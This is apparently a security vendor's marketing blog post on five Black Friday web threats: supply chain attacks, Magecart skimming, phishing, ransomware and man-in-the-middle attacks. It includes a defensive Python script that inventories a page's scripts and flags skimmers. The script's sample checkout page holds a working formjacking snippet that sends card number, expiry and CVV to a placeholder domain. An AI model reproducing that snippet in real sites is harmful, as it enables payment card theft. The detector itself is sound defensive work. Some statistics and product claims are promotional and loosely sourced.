Top 5 Most Common Web Threats for Black Friday 2022
During Black Friday 2021, 88 million Americans spent $8.9 billion online, with the average adult spending $430, so it’s no wonder that cybercriminals have marked this eCommerce bonanza on their calendars too. But there’s still time to prepare for the Black Friday web threats to come, such as web skimming and Magecart attacks, supply chain attacks, man in the middle attacks, and more.
Black Friday kicks off the holiday shopping season with millions of buyers going online to look for bargains, and the frenzy continues right up to Christmas. But it’s also a time to be on your guard as a business, because cybercriminals attacked 23% of online businesses in 2020, and those attacks caused heavy losses to unprepared organizations. So here are the five most common Black Friday web threats to look out for:
Web Supply Chain Attack
A web supply chain attack is one where criminals insert compromised hardware or software into the third-party applications and open source tools that your business relies on, and the SolarWinds attack of 2020 is one of the biggest examples of this approach. The attackers compromised SolarWinds’ build environment and planted a backdoor (known as SUNBURST) inside signed updates of its Orion software, so every customer who installed the update also installed the attackers’ code. Of Orion’s roughly 30,000 enterprise users, SolarWinds estimated that fewer than 18,000 had installed the backdoored update, and the attackers then picked which of those networks to dig further into. The average cost to the companies affected has been put at $12 million.
The lesson is continuous and strict control and monitoring of your digital supply chain, because you cannot vet a component you do not know you are running. A Reflectiz Smart Digital Supply Chain Inventory gives you that visibility for your web applications. It provides a comprehensive overview of your entire digital application ecosystem, including every third-party and open source script your site loads, maps the risks, and offers steps for mitigation. Join Reflectiz today and combat one of the most common Black Friday web threats for 2022. Read more here.
Web Skimming and Magecart
The word Magecart is a combination of Magento (the popular eCommerce platform) and shopping cart. Security researchers coined the name for a criminal group that attacked Magento shopping carts, and it has since been applied to a whole family of groups using the same technique, which achieved considerable notoriety over the second half of the 2010s. The technique itself is called web skimming or formjacking: the attacker injects malicious JavaScript into a website, often through a compromised third-party script, and that code reads the values shoppers type into HTML payment forms and sends them to a server the attacker controls, while the legitimate order goes through as normal so nobody notices. In July 2022 attackers did just this, injecting web skimming code into three online ordering platforms, MenuDrive, Harbortouch and InTouchPOS, through which 311 restaurant websites were compromised. The skimmers harvested the details of 50,000 payment cards, which were then offered for sale on the dark web.
Forbes has called this the number one cyber-security threat, which is one of the reasons why Reflectiz offers a unique sandbox simulator that detects these kinds of malicious changes before they can do harm. It can uncover next-generation cyber-attacks by analyzing which scripts try to access sensitive data, communicate with malicious domains, or log keystrokes. It also tracks changes and prioritizes alerts by severity, so you need never be caught out by a compromised third-party script. Read about the latest web skimming attack here.
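To make the two sections above concrete, the inventory that the supply chain section calls for and the skimmer behaviour described here, the following added example (not Reflectiz code, and not taken from any of the incidents mentioned) parses a constructed checkout page, lists where every script on it comes from, and flags any script body that reads card fields and ships data to a domain outside an allowlist. The page, the allowlist, the field names and the placeholder domains are assumptions; the injected script is constructed to mimic a formjacker and points at a reserved `.invalid` hostname.

```python
"""Script inventory and skimmer heuristic for a checkout page.

Added example, not Reflectiz code and not taken from any real incident.
The sample page, allowlist, field names and domains are all assumptions.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

FIRST_PARTY = "shop.example"                                         # the site itself (assumption)
ALLOWED_DOMAINS = {FIRST_PARTY, "cdn.example", "payments.example"}   # expected origins (assumption)
PAYMENT_FIELDS = ("card_number", "cvv", "expiry", "cardholder")      # this form's field names (assumption)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
EXFIL_RE = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|Image)\b")  # ways a script can send data out


class ScriptCollector(HTMLParser):
    """Gathers external script URLs and the text of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._buf = None  # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def collect(html):
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser


def domain_of(url):
    """Host of an absolute URL; a relative src is served by the site itself."""
    return urlparse(url).hostname or FIRST_PARTY


def script_inventory(html):
    """Every domain the page loads script from: the digital supply chain in miniature."""
    return sorted({domain_of(src) for src in collect(html).external})


def find_skimmers(html):
    """Flag inline scripts that read card fields and contact an unlisted domain,
    plus any external script served from an origin not on the allowlist."""
    page, findings = collect(html), []
    for i, body in enumerate(page.inline):
        fields = [f for f in PAYMENT_FIELDS if f in body]
        unknown = sorted({d for d in URL_RE.findall(body) if d not in ALLOWED_DOMAINS})
        if fields and unknown and EXFIL_RE.search(body):
            findings.append({"script": f"inline#{i}", "fields": fields, "domains": unknown,
                             "reason": "reads payment fields and sends data to an unlisted domain"})
    for src in page.external:
        domain = domain_of(src)
        if domain not in ALLOWED_DOMAINS:
            findings.append({"script": src, "fields": [], "domains": [domain],
                             "reason": "script loaded from an origin not on the allowlist"})
    return findings


# Constructed checkout page: two legitimate scripts, one analytics snippet, one injected skimmer.
SAMPLE_CHECKOUT = """<html><head>
<script src="https://cdn.example/checkout.js"></script>
<script src="/js/app.js"></script>
<script>window.analytics = { page: "checkout" };</script>
</head><body>
<form id="pay" action="https://payments.example/charge" method="post">
  <input name="card_number"><input name="expiry"><input name="cvv"><input name="cardholder">
  <button>Pay</button>
</form>
<script>
// Injected skimmer (constructed for this example): copies the card fields on submit
document.getElementById("pay").addEventListener("submit", function () {
  var f = document.forms.pay;
  var p = f.card_number.value + "|" + f.expiry.value + "|" + f.cvv.value;
  fetch("https://static-cdn.invalid/c.php?d=" + btoa(p), { mode: "no-cors" });
});
</script>
</body></html>"""

if __name__ == "__main__":
    print("scripts served from:", script_inventory(SAMPLE_CHECKOUT))
    for hit in find_skimmers(SAMPLE_CHECKOUT):
        print("SUSPICIOUS", hit)
```

A static check like this catches only an unobfuscated skimmer; real ones base64-encode the field names and assemble the exfiltration URL at runtime, which is why production monitoring executes the page in a sandbox and watches what each script actually does. Independently of detection, a Content-Security-Policy on the checkout page whose `connect-src` and `img-src` directives list only the domains you expect limits where any injected script can send what it reads.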
Phishing
Phishing exploits the weakest link in any security chain: humans. Your spam folder is probably teeming with the kind of authentic-looking emails that trick people into handing over their bank details or their login credentials for sites like PayPal or eBay.
In the run-up to Black Friday 2021, phishing attacks more than tripled, soaring from 627,560 in September to 1,935,905 in October, so we can expect at least as many attempts in the run-up to Black Friday this year.
Since you can never stop email, the next best thing is never to stop training your staff, so that they learn to avoid clicking on suspicious links and to treat unexpected SMS texts or phone calls with the same suspicion. Regular simulated phishing campaigns will then show you whether they are being as vigilant as they need to be. Training alone is never enough, though, so pair it with controls that limit what a stolen credential is worth, such as multi-factor authentication on every account that touches customer or payment data.
Ransomware
Holding people or property to ransom is one of the oldest crimes, but with so many individuals and businesses now relying on digital services, digital extortion has become a quick road to riches for criminals with little chance of detection, and retail is one of the most targeted industries. 44% of retail organizations were hit by ransomware demands during 2021, and although 32% of the victims paid up, that didn’t always help them: paying buys a decryption key at best, not a guarantee that the stolen data will stay private or that the attackers have actually left. Many victims were hit again soon after paying, because criminals know that a business focused on getting back online often forgets to close the original intrusion vector.
In 2019, ransomware attacks cost the average company $200,000. Small businesses, which are the target of an estimated 43% of online attacks, are the least able to absorb a loss of that size, and it is often claimed that 60% of them go out of business within six months of an attack.
Man in the Middle Attack
For this kind of cyberattack, imagine someone secretly eavesdropping on a phone call. Online, the attacker positions themselves between two parties who believe they are talking directly to each other, such as a shopper and your checkout page, or two of your employees on a messaging app, and can read or alter everything that passes through, including session cookies, payment details and passwords, or impersonate one side to trick the other into handing over a password so the attacker can wreak havoc. The usual opening is a connection that is not protected by TLS or whose certificate is not properly validated, for example on public Wi-Fi, so enforce HTTPS on every page of your site, send an HSTS header so browsers refuse to fall back to plain HTTP, and make sure your internal tools and messaging apps validate certificates rather than accept whatever they are offered.
This kind of costly attack can also begin with human error, such as one of your employees clicking on a link in a phishing email, and to add insult to injury, a breach that exposes customer data is treated as a compliance failure too. That’s why Reflectiz’s compliance management solution helps ensure that you never expose customer data. Compliance with privacy policies and payment card regulations is crucial to your reputation, and with Reflectiz you are always one step ahead. Our solutions help to keep you on top of your security compliance responsibilities and help you to avoid costly mistakes.